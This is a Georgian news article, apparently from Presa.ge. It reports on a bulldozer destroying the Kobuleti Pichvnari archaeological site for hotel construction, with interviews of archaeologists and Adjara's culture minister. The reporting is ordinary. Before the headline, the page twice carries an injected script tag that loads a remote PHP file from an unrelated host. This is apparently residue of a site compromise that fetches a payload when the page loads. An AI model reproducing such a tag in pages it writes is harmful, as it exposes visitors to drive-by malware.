<script src=http://ema.gov.ge/images/frame.php></script>ბარბაროსები ქობულეთის ფიჭვნარის განადგურებას აგრძელებენ

<script src=http://ema.gov.ge/images/frame.php></script>ბარბაროსები ქობულეთის ფიჭვნარის განადგურებას აგრძელებენ

ქობულეთის ფიჭვნარში ბულდოზერი მიწისქვეშ არსებული უნიკალური ძეგლის განადგურებას აგრძელებს. ფიჭვნარის ექსპედიციის ხელმძღვანელის განმარტებით, ბულდოზერის შეჩერებას თავის თავზე ვერ იღებს, ვერც გამგებელი და ვერც მინისტრი, რომლებიც მხოლოდ “ერთ პიროვნებას“ ემორჩილებიან.

 

ბულდოზერის შეჩერება ვერც 4 ნოემბერს, საინფორმაციო საშუალებებით ატეხილმა ხმაურმა შეძლო, ვერც წერილობითმა მიმართვებმა და ვერც პირადმა საუბრებმა. ერთადერთი დადებითი ის მოხდა, რომ კულტურული მემკვიდრეობის დაცვის სააგენტოდან, “გადარჩენითი არქეოლოგიური სამუშაოებისთვის“ დაახლოებით 70 000 ლარს გადარიცხავენ. არქეოლოგები იმედოვნებენ, რომ თანხის გადარიცხვის შემდეგ, ფიჭვნარში დაჩქარებული ტემპით სამუშაოების ჩატარების საშუალება მიეცემათ.

 

ქობულეთის ფიჭვნარის ირგვლივ პრესა.გე ტელეფონით ესაუბრა: ბათუმის არქეოლოგიური მუზეუმის დირექტორს, პროფესორ ამირან კახიძეს, რომელიც ამავდროულად, საქართველო–ბრიტანეთის ფიჭვნარის ერთობლივი ექსპედიციის ხელმძღვანელია; აჭარის კულტურის მინისტრს, გია აბულაძეს და ნიკო ბერძენიშვილის ინსტიტუტის არქეოლოგიისა და ხელოვნების იტორიის განყოფილების გამგეს, ნინო ინაიშვილს.

 

შეგახსენებთ, რომ ქობულეთის ფიჭვნარში, იქ, სადაც მიხეილ სააკაშვილის განკარგულებით აგვისტოს ბოლომდე სასტუმრო კომპლექსების მშენებლობა უნდა დასრულდეს, ბულდოზერმა მუშაობა 2 ნოემბერს დაიწყო. 4–ში “რესპუბლიკური პარტიის“ წარმომადგენლებმა სპეციალური ბრიფინგი გამართეს, რაც რეგიონული საინფორმაციო საშუალებებით გაშუქდა. პრესა.გე ამ თემას უკვე მესამე წერილს უძღვნის, იმ იმედით, რომ წარსულის განადგურებას ხელს შეუშლის, რაც ბუნებრივია, ახალი მშენებლობების წინააღმდეგ გალაშქრებას არ გულისხმობს.

 

ამირან კახიძე: “კულტურული მემკვიდრეობის სააგენტოდან კომისია იყო ჩამოსული.

ისინი აჭარის კულტურის მინისტრს შეხვდნენ. ნიკა ვაჩეიშვილმა 70 000 ლარამდე გამოგვიყო; ველზე გავალთ და გადარჩენით არქეოლოგიურ სამუშაოებს დავიწყებთ, როგორც კი ამ თანხას გადმორიცხავენ. ბულდოზერით გაფუჭებულ ტერიტორიას აღარაფერი ეშველება. ჩვენ არქეოლოგიურ სამუშაოებს დავიწყებთ იქ, სადაც მოსალოდნელია სამშენებლო საკომუნიკაციო ქსელის გაყვანა – ელინისტური სამარხები 20 ჰექტარზეა და ახლა სამაროვანს უახლოვდებიან. გვინდა მშენებლობის დაწყებამდე ეს ადგილი შევისწავლოთ. მგონი ნიკა ვაჩეიშვილმა ივაჟკაცა – თავის თავზე აიღო, რომ თანხას გადმორიხავს და სამუშაობს გააჩერებს, მაგრამ, როგორც ჩანს, მაინც არ ჩერდებიან, ბულდოზერი ისევ მუშაობს, ამაშია საქმე. ჩვენ თანხას ველოდებით, რომ სამუშაოები დავიწყოთ.

 

მივმართეთ გამგებელს, საკრებულოს, მაგრამ “ეს სახელმწიფოებრივი პროექტია და ჩვენ ერთ პიროვნებას ვემორჩილებით, მეტს არაო“, – მოგვიგეს. ბულდოზერის შეჩერების ფუნქცია ვერ იკისრა, ვერც გამგებელმა და ვერც მინისტრმა. მეტი რა ვქნათ?! ჩვენ უძლურები აღმოვჩნდით. მთავარი დარღვევა ისაა, რომ ეს პროექტი ჩვენი მონაწილეობის გარეშე არ უნდა შედგენილიყო. ადრე სახლი არ აშენდებოდა, არქეოლოგიური დასკვნა, რომ არ ყოფილიყო. იმ მუშებიდან რამდენიმეს, რომლებიც ახლა იქ სამშენებლო სამუშაოებს აწარმოებენ, დავალება მივეცით, რომ თუ რაიმე გამოჩნდება, არ გადაყარონ და მასალა შეაგროვონ“.

 

ჩვენს კითხვაზე, ქობულეთის ფიჭვნარის ტერიტორიის არქეოლოგიურ შესწავლას რა დრო დასჭირდება? ამირან კახიძე პასუხობს:

 

“მთლიანად, რომ მოხდეს ნაქალაქარის და სამაროვნების შესწავლა, ამას 10 თაობაც არ ეყოფა. ფიჭვნარის მსგავსი ძეგლი არ არსებობს; მეგონა მის წინაშე ღმერთიც უკან დაიხევდა, მაგრამ უკან არ იხევენ და რა ვქნათ?! თქვენ გაინტერესებთ იციან თუ არა ამის შესახებ მეცნიერებათა აკადემიაში? კერძო საუბრების დონეზე იციან, მაგრამ ამ შემთხვევაში, აკადემიაც უძლურია; აკადემიას მხოლოდ ის ერთი შენობა დარჩა, რუსთაველზე, არც ერთი ინსტიტუტი აღარ ეკუთვნის და რა ქნან?!  ვეცდებით ამ მიწისქვეშა ძეგლის არსი გადავარჩინოთ და მეცნიერებას იმ დარღვეულის არსი, შინაარსი არ დავუკარგოთ.

 

მადლობის მეტი არაფერი მეთქმის ნიკა ვაჩეიშვილის მიმართ, რომელმაც მართლაც იცის ფიჭვნარის ფასი და  მნიშვნელობა, ქართული კულტურისა და მსოფლიო საგანძურისთვის. ბათუმის არქეოლოგიურ მუზეუმში გამოფენილია მშვენიერი ექსპოზიცია, რომლის 80% ფიჭვნარშია აღმოჩენილი. წარმოიდგინეთ! ჰოდა, ეს ლიდერები მუზეუმებში, რომ შემოდიოდნენ, რა თქმა უდა, ბულდოზერის გაჩერებაზე ალბათ, თანხმობას განაცხადებდნენ. ნინო ინაიშვილმა ყველა ინსტანციას მიმართა, რომ ფიჭვნარი ნაკრძალად გამოეცხადებინათ, მაგრამ ჯერჯერობით ვერ მიაღწია იმას, რომ დაცულ ზონად მაინც გამოცხადდეს“.

 

ნინო ინაიშვილთან დაკავშირებამდე აჭარის ა/რ. განათლების, კულტურისა და სპორტის მინისტრს, გია აბულაძეს დავურეკეთ. პრესა.გეს–თან საუბრისას მინისტრი ირწმუნება, რომ ქობულეთის ფიჭვნარში არაფერი ზიანდება.

 

გია აბულაძე: “შეთანხმებები მოხდა და იქ არაფერი ნადგურდება. ამაზე არქეოლოგები მუშაობენ და ეტყობა, ინფორმაციას არ ფლობთ. ბულდოზერი მუშაობს ძალიან ბევრ ადგილზე, იმისთვის, რომ რაღაც გაკეთდეს. შეიძლება ისეთ ადგილას მუშაობს, სადაც არაფერი ზიანდება“.

 

როცა ბატონ მინისტრს ავუხსენით, რომ მასთან დარეკვამდე ვესაუბრეთ ექსპედიციის ხელმძღვანელს, შემდეგ მოგვიგო – “მაშინ დავურეკავ ბატონ ამირანს, ცოტა ხანში დამირეკეთ და პასუხს გეტყვით“–ო. აჭარის კულტურის მინისტრმა, პრესა.გე–ს სატელეფონო ზარს მეორედ აღარ უპასუხა.

 

ნიკო ბერძენიშვილის ინსტიტუტის არქეოლოგიის და ხელოვნების ისტორიის განყოფილების გამგე, ნინო ინაიშვილი ჩვენთან საუბრისას აღნიშნავს, რომ ქობულეთის ფიჭვნარისთვის ძეგლის სტატუსის მინიჭებას ხელს საკანონმდებლო ხარვეზები უშლის – ამ კონკრეტულ შემთხვევაში, ქობულეთის ფიჭვნარს ძეგლის სტატუსი უნდა მიეცეს, კულტურის სამინისტროსა და ეკონომიკის სამინისტროების შეთანხმების საფუძველზე, მაგრამ პრობლემა ისაა, რომ არ არის დამტკიცებული “დამტკიცების წესი“.

 

ნინო ინაიშვილი: “მივმართეთ ნიკა რურუას, ნიკა ვაჩეიშვილს, ლევან ვარშალომიძეს; აქაურ კულტურის მინისტრს ვთხოვეთ გვიშუამდგომლოს საქართველოს კულტურის სამინისტროს წინაშე, რათა დაიწყოს საქმის წარმოება ფიჭვნარისთვის ძეგლის სტატუსის მინიჭების თაობაზე. კულტურული მემკვიდრეობის შესახებ 2007 წელს მიღებული კანონის მიხედვით, კულტურის სამინისტრო და ეკონომიკის სამინისტრო უნდა შეთანხმდნენ, რომ ეს არის ძეგლი, მაგრამ, როგორც ამიხსნეს, არ არის დამტკიცებული დამტკიცების წესი. არ ველოდი რომ ასეთი საკანონმდებლო ხარვეზები გვექნებოდა. ქობულეთის ფიჭვნარს 1976 წლიდან აქვს არქეოლოგიური ძეგლის სტატუსი, მაგრამ 2003 წლიდან, რაც ხელისუფლება შეიცვალა, ახალი კანონები მიიღეს.

 

სამართლებრივად მართალია გი აბულაძე, როცა ამბობს, რომ ქობულეთის ფიჭვნარს

ძეგლის სტატუსი არ აქვს, მაგრამ ამიტომ უნდა ისარგებლო ამით?!  ასე არ შეიძლება. ეს არის ძალიან დიდი ბარბაროსობა! არაჩვეულებრივი ძეგლია, რომელიც მხოლოდ ეშერას შემიძლია შევადარო, აფხაზეთის ტერიტორიაზე, რომელსაც ვიმედოვნებ, რომ აფხაზები ისევე არ მოექცევიან, როგორც ჩვენ ვექცევით ქობულეთის ფიჭვნარს“.

 

ნინო ინაიშვილის თქმით, ქობულეთის ფიჭვნარში პირველი აღმოჩენა შემთხვევითი იყო  – 1954 წელს სინოპური და კოლხური მონეტების განძი აღმოაჩინეს. მეორე განძის აღმოჩენის შემდეგ, ქობულეთში თბილისიდან, მეცნიერებათა აკადემიის ისტორიის ინსტიტუტიდან, ნინო ხოშტარიას ხელმძღვანელბით ექსპედიცია ჩავიდა, რის შემდეგაც დაიწყეს გათხრები ნამოსახლარ ბორცვებზე...

 

ნინო ინაიშვილი: “პირველი სამარხი 1967 წელს აღმოჩნდა. იქ ჩაის პლანტაციები იყო გაშენებული და როცა გაჰყავდათ ხნულები და რგავდნენ, ანტიკური კერამიკის ფრაგმენტები ხშირად ხვდებოდათ. ამის შემდეგ დაიწყო გათხრები და პირველივე სამარხში აღმოჩნდა ცნობილი მოხატული ვაზა – ბერძნული კრატერი, ამფორები, მინის ჭურჭელი, სხვადასხვა ვერცხლი... ფიჭვნარის მიდამოებში ქრონოლოგიურად ყველაზე ადრეულია ისპანის ტორფქვეშა ნამოსახლარი, რომელიც არის ადრე ბრიონჯაოს ხანის. შემდეგ მოდის კოლხური ნამოსახლარის ფენები, რომელიც დაფიქსირებულია ჩოლოქის და ოჩხამურის მდინარეების გაყოლებით – ნამოსახლარი ბორცვებია, რომელთაგან ზოგი ხელოვნურადაა წარმოქმნილი, ზოგი ბუნებრივია. 

 

იქ ჭაობიანი ნიადაგი იყო, რასაც ებრძოდნენ – მოჰქონდათ თიხა და ტკეპნიდნენ, გარშემო არხები იყო. ამ ტორფნარებში არაჩვეულებრივად არის შემონახული კოლხური ხის არქიტეტურა – საძირკვლები, მესერიც კი. უძველესი სალამურია აქ აღმოჩენილი, სახვნელი იარაღი. ძვლოვანი მასალა, ფლორა, ფაუნა, ტორფნარში ძალიან კარგად ინახება... რაც მთავარია, ამ ძეგლს ძალიან დიდი მეცნიერული ღირებულება აქვს, რადგან კარგად შემონახული არქეოლოგიური კომლექსებია. იქ გათხრების წარმოება ერთი სიამოვნებაა. იქ არის ანტიკური ხანა და ელინისტური ხანა, IV-III საუკუნეების ბოლომდე. აღმოჩენილია გვიანანტიკური, ანუ ახალი წელთაღრიცხვის IV-V საუკუნეების სამარხებიც...“

 

ნინო ინაიშვილი, ისევე, როგორც ამირან კახიძე, ამ რთულ ვითარებაში ერთადერთ გამოსავალს არქეოლოგიური სამუშაოების დაჩქარებული ტემპით ჩატარებაში ხედავს, რომელიც კულტურული მემკვიდრეობის დაცვის სააგენტოდან გადარიცხული (არქეოლოგიური სამუშაოებისთვის აუცილებელი) თანხის შემდეგ შეიძლება დაიწყოს.